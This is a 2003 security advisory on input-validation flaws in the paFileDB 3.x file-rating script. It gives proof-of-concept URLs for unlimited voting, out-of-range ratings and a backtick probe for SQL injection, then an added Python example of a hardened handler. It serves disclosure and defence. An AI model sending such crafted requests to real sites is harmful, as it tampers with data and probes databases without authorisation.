
paFileDB SQL Injection Vulnerability



24th Mar 2003 [SBWID-6088]
COMMAND

	paFileDB SQL Injection Vulnerability

SYSTEMS AFFECTED

	paFileDB 3.x
	
	Tested on:
	
	         paFileDB 3.0 Final
	         paFileDB 3.0 Beta 3.1
	         paFileDB 3.1 Final

PROBLEM

	FluRDoInG [flur@flurnet.org] [http://www.flurnet.org] says :
	
	paFileDB is a file management script that supports user file rating.  It
	uses an SQL database backend. Multiple vulnerabilities exist due to  the
	lack of checked input variables. The following exploits exist:
	
	  - Modified 'id' tag allows users to submit unlimited ratings.
	  - Hand-edited 'rating' tag allows users to submit ratings above 10 or below 0.
	  - Both tags do not check for escape characters and will allow SQL injection.
	
	
	Proof-Of-Concept Exploits:
	
	http://target/pafiledb/pafiledb.php?action=rate&id=1[RANDOM]&rate=dorate&rating=10
	
	Replace [RANDOM] with a random short string and the script will  not  stop
	you from voting as many times as you like.
	
	http://target/pafiledb/pafiledb.php?action=rate&id=1&rate=dorate&rating=1000
	
	Submit a file rating of 1000 out of 10 to drive the rating up. Conversely,
	-1000 would have the opposite effect, driving the rating down.
	
	http://target/pafiledb/pafiledb.php?action=rate&id=1&rate=dorate&rating=`
	http://target/pafiledb/pafiledb.php?action=rate&id=`&rate=dorate&rating=10
	
	SQL Injection vulnerability (exploit code not included)

SOLUTION

	?
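A hardened rating handler covering the three unchecked inputs named in the advisory (the id, the rating range and the missing escaping), added here as an illustration; it is not paFileDB's own code, and the table schema, the per-voter vote key and the function names are assumptions:

```python
import re
import sqlite3
from urllib.parse import parse_qs
# Constructed stand-in for the rating tables (assumption: the real paFileDB schema is not on the page).
SCHEMA = """
CREATE TABLE files (id INTEGER PRIMARY KEY, name TEXT,
                    rating_total INTEGER NOT NULL DEFAULT 0, rating_count INTEGER NOT NULL DEFAULT 0);
CREATE TABLE votes (file_id INTEGER, voter TEXT, UNIQUE (file_id, voter));
INSERT INTO files (id, name) VALUES (1, 'example.zip');
"""
# ASCII digits only: '1abc', '`' and '-1000' are refused before they reach SQL ('²' too, which str.isdigit() allows)
ASCII_INT = re.compile(r"[0-9]+")

def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def parse_rating_request(query):
    """Return (file_id, rating) for a well-formed rate request, else None."""
    params = parse_qs(query, keep_blank_values=True)
    if params.get("action") != ["rate"] or params.get("rate") != ["dorate"]:
        return None
    raw_id = params.get("id", [""])[0]
    raw_rating = params.get("rating", [""])[0]
    if not ASCII_INT.fullmatch(raw_id) or not ASCII_INT.fullmatch(raw_rating):
        return None
    rating = int(raw_rating)
    return (int(raw_id), rating) if 0 <= rating <= 10 else None  # range check: 0..10 only

def submit_rating(conn, query, voter):
    """Apply one validated vote; return the file's new average, or None if refused."""
    file_id, rating = parse_rating_request(query) or (None, None)
    if file_id is None:
        return None
    try:  # the UNIQUE constraint, not a client-chosen id, limits each voter to one vote per file
        conn.execute("INSERT INTO votes (file_id, voter) VALUES (?, ?)", (file_id, voter))
    except sqlite3.IntegrityError:
        return None
    # Bound parameters keep the values out of the SQL text, so no quoting can alter the statement.
    cur = conn.execute("UPDATE files SET rating_total = rating_total + ?, "
                       "rating_count = rating_count + 1 WHERE id = ?", (rating, file_id))
    if cur.rowcount == 0:
        conn.rollback()  # unknown file: also undo the vote row just inserted
        return None
    conn.commit()
    total, count = conn.execute("SELECT rating_total, rating_count FROM files WHERE id = ?",
                                (file_id,)).fetchone()
    return total / count
```

The voter key would come from the session or account in a real deployment; a client-supplied value such as the id parameter cannot serve that purpose, which is exactly what the first proof-of-concept URL exploits.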

